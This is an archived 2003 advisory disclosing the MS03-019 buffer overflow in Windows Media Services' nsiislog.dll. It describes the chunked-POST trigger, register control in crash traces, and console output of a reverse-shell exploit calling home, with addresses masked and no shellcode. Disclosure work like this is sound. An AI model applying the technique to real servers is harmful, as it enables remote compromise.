======================================================================== = Windows Media Services Remote Command Execution = = NSIISLOG.DLL Ver 4.1.0.3920 = = MS Bulletin posted: May 28, 2003 revised May 30, 2003 = http ://www.microsoft.com/technet/security/bulletin/MS03-019.asp = = Affected Software: = Microsoft Windows NT 4.0 = Microsoft Windows 2000 = = Public disclosure on May 30, 2003 ======================================================================== A long time ago, in a place far far away.... Well actually it was four months ago over here in New Zealand. Christmas holidays had finished and I was half way through contemplating writing a paper entitled 'The Methodical Approach To Finding Overflows'. I thought I had better try out the concept behind this approach and the issues discovered in nsiislog.dll are some of the results of it. == MS03-019 states == Impact: Allow an attacker to execute code of their choice Max Risk: Important There is a flaw in the way in which nsiislog.dll processes incoming requests. A vulnerability exists because an attacker could send specially formed communications to the server that could cause IIS to stop responding to Internet requests. The vulnerability results because of an unchecked buffer used by the nsiislog.dll file for logging. If a specially crafted request is sent to the server, the logging file will attempt to write a larger buffer than is possible,which then in turn causes the IIS service to fail. == MS03-019 == == Description == Sending a chunked encoded post to nsiislog.dll will cause an access violation resulting in the following error log. ------------------------------------------------------------------------ Event Type: Warning Event Source: W3SVC Event Category: None Event ID: 37 Description: Out of process application '/LM/W3SVC/1/Root' terminated unexpectedly. ------------------------------------------------------------------------ A chunked encoded post will result in the control of EAX and ECX, with the exception ocurring at a mov dword ptr [ecx],eax instruction. This allows remote command execution with privileges associated with the IWAM_machinename account. == Chunked Transfer-Encoding Post == POST /scripts/nsiislog.dll HTTP/1.1 Transfer-Encoding: chunked PostLength PostData 0 Using Size: 121 Connecting....Sending Buffer.... 78003F25 dec dword ptr [ecx+0ACh] - 7800F5ED dec dword ptr [esi] ESI = 58585858 Using Size: 510 Connecting....Sending Buffer.... 77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858 ECX = 58585858 Using Size: 5000 Connecting....Sending Buffer.... 40F01DCC rep movs dword ptr [edi],dword ptr [esi] - 77FC8FE1 mov dword ptr [ecx],eax EAX = 58585858 ECX = 58585858 == Exploitation == The infamous 'mov dword ptr [ecx],eax' which allows an attacker to take control by placing a value into a position that is later retrieved for the EIP register. In this case the exception was handled internally so execution flow could not be obtained by taking advantage of SEH, but we were successful in obtaining control by overwriting a portion of another 3 leter acronym. == Exploit Example == %:\>exploit 192.168.1.63 ** IISNSLOG.DLL - 4.1.0.3920 - Remote Shell ** . Calling Home: blackhole:2000 . Using: 0x########h as ABC overwrite . Using: 0x########h as direct jump location . Shellcode Size: 322 bytes . Preparing Exploit Buffer......Ready . Starting Listener On Port: 2000 . Connecting To Target . Sending Exploit......Exploit Sent . Connection Received Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>whoami IWAM_BLACKHOLE C:\WINNT\system32> == Solutions == - Every day can be a 0-day day on the Internet. Limiting the avenues of attack can be a key factor in reducing the risk to a web server. Programs such as secureIIS and URLscan should be setup to reduce the number of methods that can be used to send data to a server. Removing unnecessary services, files and isapi extensions reduces the number of listeners that data can be fed to limiting the number of vulnerabilities that a server is susceptible to. - Install the vendor supplied patch. == Credit == Discovered and advised to Microsoft January 27, 2003 by Brett Moore. %-) shutz to: eEye, spyrit and all kiwis with hackfu %-) ha. we'll just say: "All of your livers are belong to us".
This archive was generated by hypermail 2b30 : Sun Jun 01 2003 - 10:51:56 PDT